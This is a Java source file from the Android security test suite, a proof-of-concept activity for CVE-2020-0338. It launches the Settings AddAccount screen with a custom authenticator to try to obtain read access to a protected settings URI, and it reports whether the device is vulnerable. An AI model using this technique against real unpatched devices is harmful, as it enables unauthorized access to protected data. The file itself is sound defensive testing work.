1 /* 2 * Copyright (C) 2022 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 17 package android.security.cts.CVE_2020_0338; 18 19 import android.app.Activity; 20 import android.content.Intent; 21 import android.content.Context; 22 import android.content.SharedPreferences; 23 import android.content.pm.PackageManager; 24 import android.net.Uri; 25 import android.os.Bundle; 26 import android.os.ParcelFileDescriptor; 27 28 import java.io.FileNotFoundException; 29 30 public class PocActivity extends Activity { 31 32 private Context mContext; 33 setResult(int result, String message)34 private void setResult(int result, String message) { 35 SharedPreferences sh = 36 getSharedPreferences(getString(R.string.SHARED_PREFERENCE), Context.MODE_PRIVATE); 37 SharedPreferences.Editor edit = sh.edit(); 38 edit.putInt(getString(R.string.RESULT_KEY), result); 39 edit.putString(getString(R.string.MESSAGE_KEY), message); 40 edit.commit(); 41 Intent intent = new Intent(PocActivity.this, PocService.class); 42 stopService(intent); 43 finish(); 44 } 45 46 @Override onCreate(Bundle savedInstanceState)47 protected void onCreate(Bundle savedInstanceState) { 48 super.onCreate(savedInstanceState); 49 setContentView(R.layout.activity_main); 50 mContext = this.getApplicationContext(); 51 readFileDescriptor(); 52 grantSettingsPermissions(); 53 readFileDescriptor(); 54 } 55 readFileDescriptor()56 private void readFileDescriptor() { 57 final Uri uri = getUri(); 58 try { 59 this.getContentResolver().openFileDescriptor(uri, "r"); 60 } catch (FileNotFoundException e) { 61 setResult(getResources().getInteger(R.integer.ASSUMPTION_FAILURE), e.toString()); 62 } catch (SecurityException e) { 63 // This is expected so do nothing and return 64 return; 65 } 66 setResult(getResources().getInteger(R.integer.FAIL), "Vulnerable to b/123700107!!"); 67 } 68 getUri()69 public Uri getUri() { 70 return Uri.parse(PocAuthenticator.getSettingsUris().get(0).toString()); 71 } 72 isCar(Context context)73 private static boolean isCar(Context context) { 74 PackageManager pm = context.getPackageManager(); 75 return pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE); 76 } 77 grantSettingsPermissions()78 public void grantSettingsPermissions() { 79 try { 80 String pkg = isCar(mContext) ? "com.android.car.settings" : "com.android.settings"; 81 String cls = isCar(mContext) ? "com.android.car.settings.accounts.AddAccountActivity" 82 : "com.android.settings.accounts.AddAccountSettings"; 83 String accountTypes[] = {PocAuthenticator.ACCOUNT_TYPE}; 84 Intent intent = new Intent(); 85 intent.setClassName(pkg, cls); 86 intent.putExtra("account_types", accountTypes); 87 startActivity(intent); 88 Thread.sleep(6000); 89 } catch (Exception e) { 90 setResult(getResources().getInteger(R.integer.ASSUMPTION_FAILURE), e.toString()); 91 } 92 } 93 } 94